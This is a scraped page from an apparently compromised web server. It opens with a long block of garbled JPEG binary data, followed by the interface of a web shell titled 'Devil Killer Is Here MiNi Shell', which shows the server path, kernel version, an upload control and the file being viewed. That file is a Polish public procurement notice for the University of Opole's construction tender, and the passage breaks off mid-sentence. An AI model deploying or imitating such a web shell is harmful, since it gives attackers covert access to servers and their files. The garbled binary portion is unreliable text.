JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250609/0026945301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> B/03/2025/A Roboty budowlane na potrzeby Uniwersytetu Opolskiego - Utworzenie bazy klinicznej na potrzeby kształcenia studentów kierunków medycznych w USK w Opolu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">UNIWERSYTET OPOLSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001382</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Mikołaja Kopernika 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-040</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@uni.opole.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zamowienia.uni.opole.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> B/03/2025/A Roboty budowlane na potrzeby Uniwersytetu Opolskiego - Utworzenie bazy klinicznej na potrzeby kształcenia studentów kierunków medycznych w USK w Opolu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-21cbda33-0615-458b-9e77-49382f881991</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00269453</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00090101/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 [108] Roboty budowlane</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Ze względu na ograniczoną liczbę znaków, informacja nt. finansowania ujęta w INFORMACJACH DODATKOWYCH. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1124008 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1124008</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wymagania techniczne i<br/>organizacyjne dot. korespondencji elektronicznej określono w Rozdziale I pkt. 12 SWZ.<br/>2. Ponadto Zamawiający informuje, że adres strony internetowej prowadzonego postępowania, na której udostępniano SWZ oraz na<br/>której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z<br/>postępowaniem o udzielenie zamówienia oraz za pośrednictwem której odbywa się komunikacja pomiędzy Wykonawcą a<br/>Zamawiającym: https://platformazakupowa.pl/transakcja/1124008, zwana dalej platformą zakupową.<br/>3. Jednocześnie wskazuje się, że w Rozdziale I pkt. 16 SWZ ujęto opis sposobu przygotowywania i złożenia oferty.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady<br/>(UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.<br/>Urz. UEL119 z04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1. Administratorem Państwa danych osobowych jest Uniwersytet Opolski, Pl. Kopernika 11A, 45-040 Opole.<br/>2. Inspektor ochrony danych osobowych w Uniwersytecie Opolskim tel. 77 452 7099, email:iod@uni.opole.pl<br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit.c RODO – co oznacza, że przetwarzanie jest niezbędne<br/>do wypełnienia obowiązku prawnego ciążącego na administratorze, w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego nr B/03/2025/A prowadzonym w trybie wskazanym w pkt. 2.1 SWZ.<br/>4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18-19 ustawy.<br/>5. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>6. Obowiązek podania przez Państwa danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy.<br/>7. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany.<br/>8. Posiadają Państwo:<br/>− na podstawie art. 15 RODO prawo dostępu dodanych osobowych Państwa dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych ;<br/>− na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznacie Państwo, że przetwarzanie danych<br/>osobowych Państwa dotyczących narusza przepisy RODO.<br/>9. Nie przysługuje Państwu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy. Zgodnie z art. 19 ust. 4 ustawy Zamawiający informuje o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy:<br/>−Zgodnie z art. 19 ust. 3 ustawy skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani<br/>zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>− Na mocy art. 19ust. 3 ustawy wystąpienie z żądaniem ograniczenia przetwarzania danych osobowych, o którym mowa w art. 18<br/>ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">B/03/2025/A</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I. Utworzenie bazy klinicznej na potrzeby kształcenia studentów kierunków medycznych w USK w Opolu.<br/>II. Opis przedmiotu zamówienia stanowi załącznik nr 1A do SWZ.<br/>III. Przedmiot zamówienia stanowi:<br/>1. ZADANIE 1: Przebudowa i wyposażenie pomieszczeń na potrzeby utworzenia centrum dydaktyczno-seminaryjnego wraz<br/>z kompleksem szatniowo-socjalnym dla studentów w budynku KU USK w Opolu w formule „zaprojektuj i wybuduj”.<br/>2. ZADANIE 2: Modernizacja, przebudowa i wyposażenie auli wykładowej w budynku D USK w Opolu w formule „zaprojektuj<br/>i wybuduj”.<br/>3. ZADANIE 3: Modernizacja, przebudowa i wyposażenie pomieszczeń na potrzeby utworzenia Centrum E-zdrowia i<br/>Telemedycyny wraz z pochylnią zewnętrzną, w budynku KU USK w Opolu w formule „zaprojektuj i wybuduj”.<br/>4. ZADANIE 4: Budowa windy wraz z przebudową dojścia i wejść do budynku KU USK w Opolu w formule „zaprojektuj i<br/>wybuduj”.<br/>IV. Wymagania w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy<br/>Na podstawie art. 95 ustawy Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie<br/>stosunku pracy (w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz.U. 2025 r. poz. 277 ze zm.)<br/>osób wykonujących wskazane poniżej czynności związane z realizacją zamówienia, których wykonanie polega na<br/>wykonywaniu pracy.<br/>Rodzaj czynności związanych z realizacją zamówienia, których dotyczą wymagania zatrudnienia na podstawie stosunku<br/>pracy przez Wykonawcę lub Podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia:<br/>- roboty ogólnobudowlane i montażowe w zakresie wykonania ścian działowych, zamurowania otworów,, wykonania nowych<br/>otworów drzwiowych i okiennych w ścianach działowych itd.<br/>Sposób weryfikacji przez Zamawiającego zatrudnienia tych osób oraz uprawnienia Zamawiającego w zakresie kontroli<br/>spełniania przez Wykonawcę wymagań związanych z zatrudnianiem tych osób oraz sankcji z tytułu niespełnienia tych<br/>wymagań zostały określone przez Zamawiającego w załączniku nr 3 do SWZ (projekt umowy).<br/><br/>V. Gwarancja<br/>Na dokumentację techniczną i wykonane roboty budowlane stanowiące przedmiot zamówienia Wykonawca udziela<br/>Zamawiającemu 60 miesięcy gwarancji.<br/>Na dostarczone i zamontowane urządzenia oraz osprzęt obowiązuje gwarancja producenta nie krótsza niż 24 miesiące.<br/>Jeżeli gwarancja producenta jest krótsza niż 24 miesiące to Wykonawca, w ramach wynagrodzenia zobowiązany jest<br/>zapewnić jej wydłużenie do 24 miesięcy.<br/>W czasie okresu gwarancji Wykonawca zobowiązany jest do dokonywania przeglądów i napraw zainstalowanych urządzeń,<br/>przeglądów technicznych, wymiany elementów eksploatacyjnych. Urządzenia mają być poddawane konserwacji i<br/>utrzymywane przez Wykonawcę w sprawności technicznej. Szczegółowe wymagania dot. gwarancji ujęto w Projekcie<br/>umowy – załącznik nr 3 do SWZ.<br/>VI. Przedmiot zamówienia zostanie zrealizowany:<br/>1. w okresie od dnia zawarcia umowy maksymalnie do dnia 27.02.2026 r., z zastrzeżeniem, że:<br/>1) w terminie maksymalnie 90 dni kalendarzowych od dnia zawarcia umowy Wykonawca wykona dokumentację w zakresie:<br/>a) wykonania inwentaryzacji pomieszczeń w budynkach wg. potrzeb,<br/>b) opracowania projektu architektoniczno - budowlanego (3 egz. w formie papierowej oraz 1 egz. w formie elektronicznej,<br/>pliki PDF, DWG) wraz z uzyskaniem niezbędnych uzgodnień, opinii i ekspertyz biegłych rzeczoznawców branżowych m.in.<br/>ds. ppoż. i sanitarnych oraz uzyskanie pozwoleń administracyjnych i administracyjno-sądowych, OWKZ lub zgłoszenie robót<br/>niewymagających pozwolenia na budowę (jeśli będzie wymagane) lub uzyskanie dokumentu – poświadczenia o braku takich<br/>wymagań,<br/>c) wystąpienie do właściwego organu, który koordynuje funkcjonowanie obszarów Natura 2000 na danym obszarze, a także<br/>do organów zajmującym się gospodarką wodami oraz kształtowaniem i ochroną zasobów wodnych oraz ich zarządzaniem o<br/>wydanie poświadczeń o braku oddziaływania realizowanej inwestycji na środowisko.<br/>2) w terminie maksymalnie 30 dni kalendarzowych od dnia uzyskania ostatecznej/prawomocnej decyzji – pozwolenia na<br/>budowę lub uzyskanie zaświadczenia o braku sprzeciwu wobec dokonanego zgłoszenia robót budowlanych nie<br/>wymagających pozwolenia na budowę lub uzyskania poświadczenia o braku wymagań w tym zakresie (pozwolenia na<br/>budowę czy zgłaszania robót nie wymagających pozwolenia na budowę) Wykonawca wykona dokumentację w pozostałym<br/>zakresie, tj.:<br/>a) opracowania wielobranżowego projektu technicznego wszystkich branż (3 egz. w formie papierowej oraz 1 egz. w formie<br/>elektronicznej, pliki PDF, DWG),<br/>b) opracowania projektu aranżacji wnętrz wraz wykazałem umeblowania i rozstawem urządzeń (3 egz. w formie papierowej<br/>oraz 1 egz. w formie elektronicznej, pliki PDF, DWG),<br/>c) opracowania STWiOR (2 egz. w formie papierowej oraz 1 egz. w formie elektronicznej, pliki PDF/word),<br/>d) opracowania kosztorysów inwestorskich i przedmiarów dla robót ogólnobudowlanych (1 egz. w formie papierowej, pliki<br/>PDF oraz 1 egz. w formie elektronicznej Norma pliki ath,).<br/>VII. Końcowy termin realizacji przedmiotu zamówienia wskazany w pkt. VI. jest terminem maksymalnym na realizację<br/>przedmiotu zamówienia. Wykonawca w ofercie może uwzględnić krótszy termin realizacji przedmiotu zamówienia, jednak<br/>nie wcześniejszy niż 30.01.2026 r. Rozdział I pkt. 19 SWZ stosuje się.<br/>VIII. Termin uzyskania pozwolenia na budowę lub zgłoszenia robót nie wymagających pozwolenia na budowę lub<br/>poświadczenia o braku wymagań w tym zakresie (pozwolenia na budowę czy zgłaszania robót) nie wpływa na termin<br/>opracowania dokumentacji technicznej i końcowego terminu realizacji zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-02-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktacja badanej oferty = Liczba punktów w kryterium: Cena + Liczba punktów w kryterium: Termin realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek DOT. Zdolności technicznej lub zawodowej będzie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje i skieruje do realizacji zamówienia łącznie:<br/>􀀀 KIEROWNIKIEM BUDOWY nadzorującym wykonywane u Zamawiającego prace, tj.: osobą, która posiada uprawnienia<br/>budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń* oraz będącą członkiem właściwej izby samorządu<br/>zawodowego**<br/>􀀀 KIEROWNIKIEM ROBÓT ELEKTRYCZNYCH, tj.: osobą, która posiada uprawnienia budowlane do kierowania robotami<br/>budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych* oraz<br/>będącą członkiem właściwej izby samorządu oraz będącą członkiem właściwej izby samorządu zawodowego**<br/>􀀀 KIEROWNIKIEM ROBÓT SANITARNYCH, tj.: osobą, która posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych* oraz będącą członkiem właściwej izby samorządu zawodowego**.<br/>􀀀 PROJEKTANTEM, tj. osobą posiadającą uprawnienia budowlane do projektowania w specjalności architektonicznej bez<br/>ograniczeń* oraz będącą członkiem właściwej izby samorządu zawodowego**<br/>*Określone przepisami ustawy z dnia 7 lipca 1994 r. – Prawo budowlane (Dz.U z 2025 r. poz. 418) i Rozporządzenia<br/>Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie (Dz. U. 2019 r., poz. 831) lub odpowiadające im ważne odpowiadające<br/>uprawnienia wydane w świetle wcześniej obowiązujących przepisów prawa.<br/>**Zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U.<br/>2023 r., poz. 551).<br/>A. Zasady korzystania z zasobów innych podmiotów<br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w<br/>odniesieniu do konkretnego zamówienia, lub jego części , polegać na zdolnościach podmiotów udostępniających zasoby,<br/>niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>A.1. Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, składa wraz z ofertą zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego<br/>zamówienia (sporządzone zgodnie z załącznikiem nr 4 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że<br/>Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>A.2. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt. A.1., potwierdza, że stosunek łączący<br/>Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w<br/>szczególności:<br/>A.2.1. Zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>A.2.2. Sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te<br/>zasoby przy wykonywaniu zamówienia;<br/>A.2.3. Czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>usługi, których wskazane zdolności dotyczą.<br/>A.3. Zamawiający ocenia, czy udostępniane Wykonawcy przez inne podmioty zdolności, pozwalają na wykazanie przez<br/>Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 3-4 ustawy, a także bada,<br/>czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy.<br/>A.4. Jeżeli zdolności podmiotu udostępniającego zasoby nie potwierdzają spełnienia przez Wykonawcę warunków udziału w<br/>postępowaniu lub zachodzą wobec tego podmiotów podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie<br/>określonym przez Zamawiającego:<br/>A.4.1. Zastąpił ten podmiot innym podmiotem lub podmiotami albo<br/>A.4.2. Wykazał, że samodzielnie spełnia 